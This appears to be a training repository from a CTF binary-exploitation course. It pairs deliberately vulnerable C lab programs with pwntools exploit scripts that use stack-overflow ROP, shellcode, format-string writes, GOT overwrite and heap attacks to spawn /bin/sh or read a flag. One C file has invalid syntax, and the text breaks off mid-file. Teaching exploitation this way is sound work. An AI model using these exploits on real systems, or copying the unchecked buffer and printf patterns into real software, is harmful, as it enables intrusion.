├── .gitignore ├── src ├── 02_shellcode │ ├── flag │ ├── exp_sc2.py │ ├── sc1.c │ ├── exp_sc4.py │ ├── exp_sc3.py │ ├── sc2.c │ ├── sc4.c │ ├── exp_sc5.py │ ├── sc5.c │ ├── sc1_seccomp.c │ └── sc3.c ├── 01_stack │ ├── exp_stack1.py │ ├── exp_stack2.py │ ├── exp_stack3.py │ ├── exp_stack4_success.py │ ├── exp_stack4.py │ ├── stack1.c │ ├── stack5.c │ ├── stack2.c │ ├── exp_stack5_success.py │ ├── stack4.c │ ├── exp_stack5.py │ └── stack3.c ├── 04_dynamic_link │ ├── dl1.c │ ├── dl2.c │ ├── exp_dl2.py │ ├── exp_dl3.py │ └── dl3.c ├── 03_format_string │ ├── fs3.c │ ├── fs2.c │ ├── fs4.c │ ├── fs5.c │ ├── exp_fs4.py │ └── fs1.c └── 05_heap │ ├── heap1.c │ ├── exp_heap2.py │ ├── exp_heap6.py │ ├── exp_heap3.py │ ├── exp_heap4.py │ ├── heap2.c │ ├── exp_heap5.py │ ├── heap4.c │ ├── heap5.c │ ├── heap6.c │ └── heap3.c ├── .gitattributes ├── slides ├── 5-2-堆基础.pptx ├── 5-堆入门.pptx ├── 1-2-进阶栈溢出.pptx ├── 3-格式化字符串.pptx ├── 2-shellcode.pptx ├── 1-1-基本工具介绍以及简单栈溢出.pptx └── 4-动态链接-plt表和got表.pptx └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | *.swp 2 | *.i64 3 | *.txt 4 | *.gdb_history -------------------------------------------------------------------------------- /src/02_shellcode/flag: -------------------------------------------------------------------------------- 1 | flag{tesssssssssssssssssst} 2 | -------------------------------------------------------------------------------- /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /slides/5-2-堆基础.pptx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/7Hxz233/Lilac_2020_summer_pwn/HEAD/slides/5-2-堆基础.pptx -------------------------------------------------------------------------------- /slides/5-堆入门.pptx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/7Hxz233/Lilac_2020_summer_pwn/HEAD/slides/5-堆入门.pptx -------------------------------------------------------------------------------- /slides/1-2-进阶栈溢出.pptx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/7Hxz233/Lilac_2020_summer_pwn/HEAD/slides/1-2-进阶栈溢出.pptx -------------------------------------------------------------------------------- /slides/3-格式化字符串.pptx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/7Hxz233/Lilac_2020_summer_pwn/HEAD/slides/3-格式化字符串.pptx -------------------------------------------------------------------------------- /slides/2-shellcode.pptx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/7Hxz233/Lilac_2020_summer_pwn/HEAD/slides/2-shellcode.pptx -------------------------------------------------------------------------------- /slides/1-1-基本工具介绍以及简单栈溢出.pptx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/7Hxz233/Lilac_2020_summer_pwn/HEAD/slides/1-1-基本工具介绍以及简单栈溢出.pptx -------------------------------------------------------------------------------- /slides/4-动态链接-plt表和got表.pptx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/7Hxz233/Lilac_2020_summer_pwn/HEAD/slides/4-动态链接-plt表和got表.pptx -------------------------------------------------------------------------------- /src/01_stack/exp_stack1.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | 4 | #io = process("./stack1") 5 | io = process("./stack1_canary") 6 | io.send(b'a'*0x1c + p32(0xdeadbeef)) 7 | 8 | io.interactive() 9 | -------------------------------------------------------------------------------- /src/01_stack/exp_stack2.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #io = process('./stack2') 4 | io = gdb.debug(['./stack2'], "b *0x4006B4") 5 | 6 | io.sendline(b'a'*0x18 + p64(0x400666)) 7 | 8 | io.interactive() 9 | -------------------------------------------------------------------------------- /src/01_stack/exp_stack3.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | io = process("./stack3") 4 | 5 | # io = gdb.debug(['./stack3'], "b print_name") 6 | 7 | payload = b"a"*0x18 + p64(0x00000000004007c3) + p64(0x4007E4) + p64(0x400666) 8 | 9 | io.sendlineafter("name plz", payload) 10 | 11 | io.interactive() -------------------------------------------------------------------------------- /src/02_shellcode/exp_sc2.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.arch = 'amd64' 4 | 5 | io = process(['./sc2']) 6 | # io = gdb.debug(['./sc2'], "b *0x4005ed") 7 | 8 | bss_buf = 0x601060 9 | 10 | sc = asm(shellcraft.amd64.linux.sh()) 11 | 12 | io.sendline(sc.ljust(0x80, '\x90')+p64(0) + p64(bss_buf)) 13 | 14 | io.interactive() 15 | -------------------------------------------------------------------------------- /src/04_dynamic_link/dl1.c: -------------------------------------------------------------------------------- 1 | // gcc -O0 -no-pie dl1.c -o dl1 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | 9 | 10 | int main(){ 11 | printf("hello %s\n", "ikun"); 12 | puts("bye bye"); 13 | // printf("hello world\n"); 14 | return 0; 15 | } -------------------------------------------------------------------------------- /src/02_shellcode/sc1.c: -------------------------------------------------------------------------------- 1 | 2 | // gcc ./sc1.c -g -o sc1 3 | int main(){ 4 | char *binsh = "/bin/sh\0"; 5 | __asm__ ("mov $59, %%rax\n\t" 6 | "mov %0, %%rdi\n\t" 7 | "xor %%rsi, %%rsi\n\t" 8 | "xor %%rdx, %%rdx\n\t" 9 | "syscall\n\t" 10 | : 11 | : "r"(binsh) 12 | : "rax" 13 | ); 14 | return 0; 15 | } 16 | -------------------------------------------------------------------------------- /src/02_shellcode/exp_sc4.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.arch = 'amd64' 4 | 5 | io = process(['./sc4']) 6 | # io = gdb.debug(['./sc4'], "b *0x40060c") 7 | 8 | bss_buf = 0x601060 9 | 10 | sc = "Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t" 11 | 12 | io.sendline(sc) 13 | 14 | io.interactive() 15 | -------------------------------------------------------------------------------- /src/01_stack/exp_stack4_success.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | io = process('./stack4') 4 | # io = gdb.debug(['./stack4'], "b *0x400681") 5 | 6 | 7 | io.recvuntil(b'ft: ') 8 | 9 | stack_addr = int(io.recvline().strip(), 16) 10 | 11 | print(hex(stack_addr)) 12 | 13 | io.sendline( 14 | p64(stack_addr) + 15 | p64(0x4007A3) + 16 | p64(0x4007C4) + 17 | p64(0x400666) + 18 | p64(stack_addr)[:2] 19 | ) 20 | io.interactive() 21 | -------------------------------------------------------------------------------- /src/01_stack/exp_stack4.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | io = process("./stack4") 4 | 5 | # io = gdb.debug(['./stack4'], "b print_name") 6 | 7 | 8 | io.recvuntil("gift: ") 9 | 10 | stack_address = int(io.recvline().strip(), 16) 11 | 12 | print("stack addr", hex(stack_address)) 13 | 14 | payload = p64(0xdeadbeef) + p64(0x00000000004007a3) + p64(0x4007C4) + p64(0x400666) + p64(stack_address) 15 | 16 | 17 | io.sendlineafter(" name plz", payload) 18 | 19 | io.interactive() 20 | -------------------------------------------------------------------------------- /src/02_shellcode/exp_sc3.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.arch = 'amd64' 4 | 5 | io = process(['./sc3']) 6 | # io = gdb.debug(['./sc3'], "b *0x400a53") 7 | 8 | bss_buf = 0x6010a0 9 | 10 | sc = shellcraft.amd64.linux.open("./flag", 0) 11 | sc += shellcraft.amd64.linux.read(3, bss_buf+0x100, 0x40) 12 | sc += shellcraft.amd64.linux.write(1, bss_buf+0x100, 0x40) 13 | sc = asm(sc) 14 | 15 | io.sendline(sc.ljust(0x80, '\x90')+p64(0) + p64(bss_buf)) 16 | 17 | io.interactive() 18 | -------------------------------------------------------------------------------- /src/02_shellcode/sc2.c: -------------------------------------------------------------------------------- 1 | // gcc -O0 -fno-stack-protector -z execstack -no-pie sc2.c -o sc2 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | char bss_buf[0x100]; 8 | 9 | int main(int argc, char** argv){ 10 | char buf[0x70] = {0}; 11 | buf[0x6f] = 'a'; 12 | write(1, "input ur name plz\n", 18); 13 | int n = read(0, buf, 0x100); 14 | memcpy(bss_buf, buf, 0x100); 15 | write(1, "bye bye", 7); 16 | write(1, bss_buf, n); 17 | return 0; 18 | } 19 | -------------------------------------------------------------------------------- /src/01_stack/stack1.c: -------------------------------------------------------------------------------- 1 | // gcc -O0 -fno-stack-protector -no-pie stack1.c -o stack1 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | void shell(){ 8 | printf("You did it.\n"); 9 | system("/bin/sh"); 10 | } 11 | 12 | int main(int argc, char** argv){ 13 | int set_me = 0; 14 | char buf[15]; 15 | puts("input the password:"); 16 | read(0, buf, 0x20); 17 | if(set_me == 0xdeadbeef) 18 | shell(); 19 | else 20 | printf("Not authenticated.\nset_me was %d\n", set_me); 21 | 22 | return EXIT_SUCCESS; 23 | } 24 | -------------------------------------------------------------------------------- /src/01_stack/stack5.c: -------------------------------------------------------------------------------- 1 | // gcc -O0 -fno-stack-protector stack5.c -no-pie -o stack5 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | void print_name(char* input) { 8 | char buf[0x20]; 9 | // strcpy(buf, input); 10 | memcpy(buf, input, 0x100); 11 | printf("Hello %s\n", buf); 12 | } 13 | 14 | int main(int argc, char** argv) { 15 | char buf[0x100]; 16 | puts("welcome to stack5"); 17 | printf("Here is a gift: %p\n", stdout); 18 | puts("input your name plz"); 19 | 20 | read(0, buf, 0x100); 21 | 22 | print_name(buf); 23 | 24 | return EXIT_SUCCESS; 25 | } 26 | -------------------------------------------------------------------------------- /src/02_shellcode/sc4.c: -------------------------------------------------------------------------------- 1 | // gcc -fno-stack-protector -z execstack -no-pie sc4.c -o sc4 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | 8 | char bss_buf[0x400]; 9 | 10 | int main(int argc, char** argv){ 11 | char buf[0x400]; 12 | write(1, "input ur name plz\n", 18); 13 | int n = read(0, buf, 0x500); 14 | for(int i = 0; i < 0x400; i++){ 15 | char ch = buf[i]; 16 | if (ch >= 0x80) break; 17 | bss_buf[i] = buf[i]; 18 | } 19 | write(1, "bye bye", 7); 20 | void (* p)(void) = &bss_buf; 21 | p(); 22 | 23 | return 0; 24 | } 25 | -------------------------------------------------------------------------------- /src/01_stack/stack2.c: -------------------------------------------------------------------------------- 1 | // gcc -O0 -g -fno-stack-protector -no-pie stack2.c -o stack2 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | void shell(){ 8 | system("/bin/sh"); 9 | } 10 | 11 | void print_name(char* input) { 12 | char buf[15]; 13 | // strcpy(buf, input); 14 | memcpy(buf, input, 0x100); 15 | printf("Hello %s\n", buf); 16 | } 17 | 18 | int main(int argc, char** argv) 19 | { 20 | char buf[0x100]; 21 | puts("welcome to stack2"); 22 | puts("input your name plz"); 23 | read(0, buf, 0x100); 24 | 25 | print_name(buf); 26 | 27 | return EXIT_SUCCESS; 28 | } 29 | -------------------------------------------------------------------------------- /src/01_stack/exp_stack5_success.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | io = process('./stack5') 4 | 5 | 6 | io.recvuntil(b'ft: ') 7 | 8 | libc_addr = int(io.recvline().strip(), 16) 9 | print(hex(libc_addr)) 10 | libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 11 | libc.address = libc_addr - 0x3c5620 12 | print("libc base", hex(libc.address)) 13 | system_addr = libc.symbols['system'] 14 | binsh_addr = libc.search("/bin/sh\0").next() 15 | 16 | PrdiR = 0x400773 17 | gdb.attach(io, "b print_name") 18 | 19 | io.sendline( 20 | 'a'*0x28 + 21 | p64(PrdiR) + 22 | p64(binsh_addr) + 23 | p64(system_addr) 24 | ) 25 | io.interactive() 26 | -------------------------------------------------------------------------------- /src/04_dynamic_link/dl2.c: -------------------------------------------------------------------------------- 1 | // gcc -g -O0 -fno-stack-protector dl2.c -no-pie -o dl2 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | void print_name(char* input) { 8 | char buf[0x20]; 9 | // strcpy(buf, input); 10 | memcpy(buf, input, 0x100); 11 | printf("Hello %s\n", buf); 12 | } 13 | 14 | int main(int argc, char** argv) { 15 | setbuf(stdin, NULL); 16 | setbuf(stdout, NULL); 17 | setbuf(stderr, NULL); 18 | char buf[0x100]; 19 | puts("welcome to dl2"); 20 | // printf("Here is a gift: %p\n", stdout); 21 | puts("input your name plz"); 22 | 23 | read(0, buf, 0x100); 24 | 25 | print_name(buf); 26 | 27 | return EXIT_SUCCESS; 28 | } 29 | -------------------------------------------------------------------------------- /src/01_stack/stack4.c: -------------------------------------------------------------------------------- 1 | // gcc -O0 -fno-stack-protector stack4.c -no-pie -o stack4 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | char *sh_str = "/bin/sh"; 8 | 9 | void shell(char* cmd){ 10 | system(cmd); 11 | } 12 | 13 | void print_name(char* input) { 14 | char buf[0x20]; 15 | // strcpy(buf, input); 16 | memcpy(buf, input, 0x22); 17 | printf("Hello %s\n", buf); 18 | } 19 | 20 | int main(int argc, char** argv){ 21 | char buf[0x100]; 22 | puts("welcome to stack4"); 23 | printf("here is a gift: %p\n", buf); 24 | puts("input your name plz"); 25 | read(0, buf, 0x100); 26 | 27 | print_name(buf); 28 | 29 | return EXIT_SUCCESS; 30 | } 31 | -------------------------------------------------------------------------------- /src/03_format_string/fs3.c: -------------------------------------------------------------------------------- 1 | // gcc -O0 fs3.c -no-pie -o fs3 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | int main(){ 13 | 14 | int set_me = 0x12345687; 15 | int *ptr = &set_me; 16 | // format string vuln 17 | puts("input your name plz"); 18 | printf("hello, "); 19 | char buf[0x11]; 20 | int n = read(0, buf, 0x10); 21 | buf[n] = 0; 22 | printf(buf); 23 | 24 | if (set_me == 0x12345678){ 25 | printf("you did it\n"); 26 | system("/bin/sh"); 27 | } 28 | return 0; 29 | } -------------------------------------------------------------------------------- /src/03_format_string/fs2.c: -------------------------------------------------------------------------------- 1 | // gcc -O0 fs2.c -no-pie -o fs2 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | int main(){ 13 | srand(time(NULL)); 14 | int random = rand(); 15 | 16 | // format string vuln 17 | puts("input your name plz"); 18 | printf("hello, "); 19 | char buf[6]; 20 | int n = read(0, buf, 5); 21 | buf[n] = 0; 22 | printf(buf); 23 | 24 | printf("try guess the number: "); 25 | int input = 0; 26 | scanf("%d", &input); 27 | 28 | if (input == random){ 29 | printf("you did it\n"); 30 | system("/bin/sh"); 31 | } 32 | } -------------------------------------------------------------------------------- /src/03_format_string/fs4.c: -------------------------------------------------------------------------------- 1 | // gcc -pie -fPIE fs4.c -o fs4 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | void shell(){ 13 | system("/bin/sh"); 14 | } 15 | 16 | int vuln(){ 17 | int a = 0; 18 | int *b = &a; 19 | int **c = &b; 20 | 21 | char buf[0x30]; 22 | while(1){ 23 | puts("input sth"); 24 | int n = read(0, buf, 0x1f); 25 | if (strncmp(buf, "quit", 4) == 0) 26 | break; 27 | buf[n] = 0; 28 | printf(buf); 29 | } 30 | puts("bye bye"); 31 | return 0; 32 | } 33 | 34 | int main(){ 35 | return vuln(); 36 | } -------------------------------------------------------------------------------- /src/01_stack/exp_stack5.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | io = process("./stack5") 4 | 5 | # io = gdb.debug(['./stack5'], "b print_name") 6 | 7 | 8 | io.recvuntil("gift: ") 9 | 10 | stdout_addr = int(io.recvline().strip(), 16) 11 | 12 | libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so") 13 | 14 | libc.address = stdout_addr - 0x3c5620 15 | 16 | # print("stdout addr", hex(stdout_addr)) 17 | 18 | # system_addr = stdout_addr - 0x380280 19 | 20 | # print("system addr", hex(system_addr)) 21 | 22 | # binsh_addr = system_addr + 1342071 23 | 24 | system_addr = libc.symbols['system'] 25 | binsh_addr = libc.search("/bin/sh\0").next() 26 | 27 | 28 | payload = 'a'*0x28 + p64(0x0000000000400773) + p64(binsh_addr) + p64(system_addr) 29 | 30 | 31 | io.sendlineafter(" name plz", payload) 32 | 33 | io.interactive() 34 | -------------------------------------------------------------------------------- /src/03_format_string/fs5.c: -------------------------------------------------------------------------------- 1 | // gcc -pie -fPIE fs5.c -o fs5 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | void shell(){ 13 | system("/bin/sh"); 14 | } 15 | 16 | int vuln(){ 17 | char buf[0x30]; 18 | while(1){ 19 | puts("input sth"); 20 | int n = read(0, buf, 0x1f); 21 | if (strncmp(buf, "quit", 4) == 0) 22 | break; 23 | buf[n] = 0; 24 | printf(buf); 25 | } 26 | puts("bye bye"); 27 | return 0; 28 | } 29 | 30 | int func1(){ 31 | vuln(); 32 | } 33 | 34 | int main(){ 35 | return func1(); 36 | // printf("%p%n", 1, 2, 3); 37 | // printf(buf, ) 38 | } -------------------------------------------------------------------------------- /src/03_format_string/exp_fs4.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | io = process("./fs4") 4 | # io = gdb.debug('./fs4', 'b *0x555555554978\nb *0x5555555549A5') 5 | 6 | io.sendlineafter("input sth\n", "%19$p\n") 7 | 8 | elf_addr = int(io.recvline(), 16) 9 | shell_addr = elf_addr + (0x8E0 - 0x9B5) 10 | 11 | print("shell addr : " + hex(shell_addr)) 12 | 13 | io.sendlineafter("input sth\n", "%18$p\n") 14 | 15 | stack_addr = int(io.recvline(), 16) 16 | 17 | print("stack addr" + hex(stack_addr)) 18 | 19 | ret_addr_addr = stack_addr - 8 20 | 21 | payload = "%{}c%9$hhn\n".format(ret_addr_addr & 0xff) 22 | io.sendlineafter("input sth\n", payload) 23 | 24 | 25 | payload2 = "%{}c%8$hn\n".format(shell_addr & 0xffff) 26 | io.sendlineafter("input sth\n", payload2) 27 | 28 | io.sendlineafter("input sth\n", "quit") 29 | 30 | io.interactive() -------------------------------------------------------------------------------- /src/01_stack/stack3.c: -------------------------------------------------------------------------------- 1 | // gcc -O0 -fno-stack-protector stack3.c -no-pie -o stack3 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | char *sh_str = "/bin/sh"; 8 | 9 | void shell(char* cmd){ 10 | system(cmd); 11 | } 12 | 13 | void print_name(char* input) { 14 | char buf[15]; 15 | // strcpy(buf, input); 16 | memcpy(buf, input, 0x100); 17 | printf("Hello %s\n", buf); 18 | } 19 | 20 | int test_parament( 21 | int a1, 22 | int a2; 23 | int a3; 24 | int a4; 25 | int a5; 26 | int a6; 27 | int a7; 28 | ){ 29 | return 0x1234; 30 | } 31 | 32 | int main(int argc, char** argv){ 33 | 34 | test_parament(1, 2, 3, 4, 5, 6, 7); 35 | char buf[0x100]; 36 | puts("welcome to stack3"); 37 | puts("input your name plz"); 38 | read(0, buf, 0x100); 39 | 40 | print_name(buf); 41 | 42 | return EXIT_SUCCESS; 43 | } 44 | -------------------------------------------------------------------------------- /src/04_dynamic_link/exp_dl2.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | from pwn import * 3 | 4 | context.arch = 'amd64' 5 | 6 | elf = ELF("./dl2") 7 | libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so") 8 | 9 | # io = gdb.debug('./dl2', 'b *0x400751') 10 | io = process(['./dl2']) 11 | 12 | main = 0x0000000000400753 13 | PrdiR = 0x400853 14 | plt_puts = elf.plt['puts'] 15 | got_puts = elf.got['puts'] 16 | 17 | p1 = flat('\0'*0x20, 0, 18 | PrdiR, got_puts, 19 | plt_puts, 20 | main 21 | ) 22 | 23 | io.sendlineafter("plz\n", p1) 24 | io.recvuntil("Hello \n") 25 | 26 | puts_addr = u64(io.recv(6)+'\0\0') 27 | libc.address = puts_addr - libc.symbols['puts'] 28 | 29 | print("libc base : " + hex(libc.address)) 30 | 31 | 32 | binsh_addr = next(libc.search('/bin/sh\0')) 33 | system_addr = libc.symbols['system'] 34 | 35 | p2 = flat('\0'*0x20, 0, PrdiR, binsh_addr, system_addr) 36 | io.sendlineafter("plz\n", p2) 37 | 38 | io.interactive() 39 | -------------------------------------------------------------------------------- /src/02_shellcode/exp_sc5.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | from time import sleep 3 | import string 4 | 5 | context.arch = 'amd64' 6 | 7 | io = process(['./sc5']) 8 | # io = gdb.debug(['./sc5'], "b *0x400a5a") 9 | 10 | flag_addr = 0x6010c0 11 | bss_buf = 0x6010a0 12 | 13 | sc_tmp = asm(""" 14 | mov rax, 0x1234567812345678 15 | mov bl, byte ptr [rax] 16 | mov rax, 0x6010bf 17 | mov cl, byte ptr [rax] 18 | cmp bl, cl 19 | je infloop 20 | ret 21 | infloop: 22 | jmp infloop 23 | """) 24 | 25 | # io.sendlineafter("code", sc+"x") 26 | 27 | 28 | context.log_level = 'info' 29 | flag = "flag{t" 30 | for i in range(len(flag), 0x40): 31 | for ch in "flag{}test": 32 | print(i, ch) 33 | io = process("./sc5") 34 | sc = (sc_tmp.replace(p64(0x1234567812345678), p64(flag_addr+i))).ljust(0x1f) 35 | io.sendlineafter("code", sc+(ch)) 36 | sleep(0.3) 37 | if io.connected() : 38 | flag += (ch) 39 | print(flag) 40 | io.close() 41 | break 42 | io.close() 43 | sleep(0.5) 44 | 45 | # io.interactive() 46 | -------------------------------------------------------------------------------- /src/04_dynamic_link/exp_dl3.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | from pwn import * 3 | 4 | context.arch = 'amd64' 5 | 6 | elf = ELF("./dl3") 7 | libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so") 8 | 9 | # io = gdb.debug('./dl3', 'b *0x40091f') # break at `call atoi` 10 | io = process(['./dl3']) 11 | 12 | def read8(p, addr): 13 | io.sendlineafter("choice:", '1') 14 | io.sendlineafter("addr : ", str(addr)) 15 | return u64(io.recv(8)) 16 | 17 | def write8(p, addr, val): 18 | io.sendlineafter("choice:", '2') 19 | io.sendlineafter("addr : ", str(addr)) 20 | io.sendlineafter("value : ", str(val)) 21 | 22 | main = 0x0000000000400753 23 | PrdiR = 0x400ad3 24 | plt_puts = elf.plt['puts'] 25 | got_puts = elf.got['puts'] 26 | 27 | 28 | puts_addr = read8(io, got_puts) 29 | libc.address = puts_addr - libc.symbols['puts'] 30 | 31 | print("libc base : " + hex(libc.address)) 32 | 33 | binsh_addr = next(libc.search('/bin/sh\0')) 34 | system_addr = libc.symbols['system'] 35 | 36 | write8(io, elf.got['atoi'], system_addr) 37 | 38 | io.sendlineafter("choice:", '/bin/sh;') 39 | 40 | 41 | io.interactive() 42 | -------------------------------------------------------------------------------- /src/05_heap/heap1.c: -------------------------------------------------------------------------------- 1 | // gcc -O0 -g -no-pie heap1.c -o heap1 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | int arr_bss[0x100]; 10 | 11 | void basic(){ 12 | // // int *arr_stack = alloca(0x1000); 13 | // int *arr_stack = alloca(0x1000000); 14 | // arr_stack[0] = 1; 15 | 16 | int *arr_heap = malloc(0x20); 17 | arr_heap[0] = 123; 18 | free(arr_heap); 19 | } 20 | 21 | int test_chunk(){ 22 | void *A = malloc(0x20); 23 | void *B = malloc(0x30); 24 | void *C = malloc(0x40); 25 | printf("A: %p\nB: %p\nC: %p\n", A, B, C); 26 | } 27 | 28 | int test_free_chunk(){ 29 | void *fast1 = malloc(0x20); 30 | void *fast2 = malloc(0x20); 31 | void *fast3 = malloc(0x30); 32 | // printf("fast1: %p\nfast2: %p\nfast3: %p\n", fast1, fast2, fast3); 33 | free(fast1); 34 | free(fast2); 35 | free(fast3); 36 | 37 | void *unsorted1 = malloc(0x80); 38 | // printf("unsorted1: %p\n", unsorted1); 39 | malloc(0x20); 40 | free(unsorted1); 41 | } 42 | 43 | int main(){ 44 | test_free_chunk(); 45 | return 0; 46 | } -------------------------------------------------------------------------------- /src/05_heap/exp_heap2.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.arch = 'amd64' 4 | context.terminal = ['tmux', 'split', '-h'] 5 | 6 | ru = lambda p, x : p.recvuntil(x) 7 | sn = lambda p, x : p.send(x) 8 | rl = lambda p : p.recvline() 9 | sl = lambda p, x : p.sendline(x) 10 | rv = lambda p, x=1024 : p.recv(numb = x) 11 | sa = lambda p, a, b : p.sendafter(a,b) 12 | sla = lambda p, a, b : p.sendlineafter(a,b) 13 | rr = lambda p, t : p.recvrepeat(t) 14 | rd = lambda p, x : p.recvuntil(x, drop=True) 15 | 16 | io = gdb.debug(['./heap2'], "b 43\nc") 17 | 18 | def choice(p, idx): 19 | sla(p, "choice : ", str(idx)) 20 | 21 | def add(p, idx, size): 22 | choice(p, 1) 23 | sla(p, "idx plz : ", str(idx)) 24 | sla(p, "size plz : ", str(size)) 25 | 26 | def rm(p, idx): 27 | choice(p, 2) 28 | sla(p, "idx plz : ", str(idx)) 29 | 30 | def show(p, idx): 31 | choice(p, 3) 32 | sla(p, "idx plz : ", str(idx)) 33 | 34 | 35 | add(io, 0, 0x500) 36 | add(io, 1, 0x10) 37 | rm(io, 0) 38 | show(io, 0) 39 | 40 | libc_addr = u64(rv(io, 6)+'\0\0') 41 | 42 | print("libc_addr : " + hex(libc_addr)) 43 | 44 | io.interactive() -------------------------------------------------------------------------------- /src/04_dynamic_link/dl3.c: -------------------------------------------------------------------------------- 1 | // gcc -g -O0 dl3.c -no-pie -o dl3 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | int get_int(){ 8 | char buf[0x10] = {0}; 9 | // buf[0x0f] = 0; 10 | read(0, buf, 0x0f); 11 | return atoi(buf); 12 | } 13 | 14 | long long get_ll(){ 15 | char buf[0x20] = {0}; 16 | // buf[0x0f] = 0; 17 | read(0, buf, 0x1f); 18 | return atoll(buf); 19 | } 20 | 21 | int get_choice(){ 22 | char buf[0x10]; 23 | buf[0x0f] = 0; 24 | puts("1. read 8 bytes"); 25 | puts("2. write 8 bytes"); 26 | printf("input the choice:"); 27 | read(0, buf, 0x0f); 28 | return atoi(buf); 29 | } 30 | 31 | int main(int argc, char** argv) { 32 | // char buf[0x100]; 33 | setbuf(stdin, NULL); 34 | setbuf(stdout, NULL); 35 | setbuf(stderr, NULL); 36 | puts("welcome to dl3"); 37 | int choice = 3; 38 | int cnt = 0; 39 | while ((choice = get_choice()) != 3 && (cnt++ < 5)){ 40 | if (choice == 1) { 41 | printf("input addr : "); 42 | long long *addr = get_ll(); 43 | write(1, addr, 8); 44 | } else if (choice == 2) { 45 | printf("input addr : "); 46 | long long *addr = get_ll(); 47 | printf("input value : "); 48 | long long value = get_ll(); 49 | *addr = value; 50 | } else { 51 | puts("invalid choice"); 52 | } 53 | } 54 | puts("bye bye"); 55 | return EXIT_SUCCESS; 56 | } 57 | -------------------------------------------------------------------------------- /src/05_heap/exp_heap6.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.arch = 'amd64' 4 | context.terminal = ['tmux', 'split', '-h'] 5 | elf = ELF('./heap6') 6 | 7 | ru = lambda p, x : p.recvuntil(x) 8 | sn = lambda p, x : p.send(x) 9 | rl = lambda p : p.recvline() 10 | sl = lambda p, x : p.sendline(x) 11 | rv = lambda p, x=1024 : p.recv(numb = x) 12 | sa = lambda p, a, b : p.sendafter(a,b) 13 | sla = lambda p, a, b : p.sendlineafter(a,b) 14 | rr = lambda p, t : p.recvrepeat(t) 15 | rd = lambda p, x : p.recvuntil(x, drop=True) 16 | 17 | # io = gdb.debug(['./heap6'], "b 43\nc") 18 | 19 | io = process("./heap6") 20 | 21 | def choice(p, idx): 22 | sla(p, "choice : ", str(idx)) 23 | 24 | def add(p, idx, size): 25 | choice(p, 1) 26 | sla(p, "idx plz : ", str(idx)) 27 | sla(p, "size plz : ", str(size)) 28 | 29 | def rm(p, idx): 30 | choice(p, 2) 31 | sla(p, "idx plz : ", str(idx)) 32 | 33 | def show(p, idx): 34 | choice(p, 3) 35 | sla(p, "idx plz : ", str(idx)) 36 | 37 | def edit(p, idx, data): 38 | choice(p, 4) 39 | sla(p, "idx plz : ", str(idx)) 40 | sa(p, "content plz : ", data) 41 | 42 | target = 0x6029B8 43 | 44 | add(io, 0, 0x100) 45 | add(io, 1, 0x100) 46 | rm(io, 0) 47 | 48 | edit(io, 0, flat(0, target-0x10)) 49 | 50 | # gdb.attach(io, "b malloc") 51 | 52 | add(io, 2, 0x100) 53 | 54 | choice(io, 5) 55 | 56 | io.interactive() -------------------------------------------------------------------------------- /src/02_shellcode/sc5.c: -------------------------------------------------------------------------------- 1 | // gcc -fno-stack-protector -z execstack -no-pie sc5.c -o sc5 -lseccomp 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | 14 | 15 | void die(char *msg){ 16 | puts(msg); 17 | exit(-1); 18 | } 19 | 20 | int init_seccomp() { 21 | scmp_filter_ctx ctx; 22 | int rc = -1; 23 | ctx = seccomp_init(SCMP_ACT_KILL); 24 | if 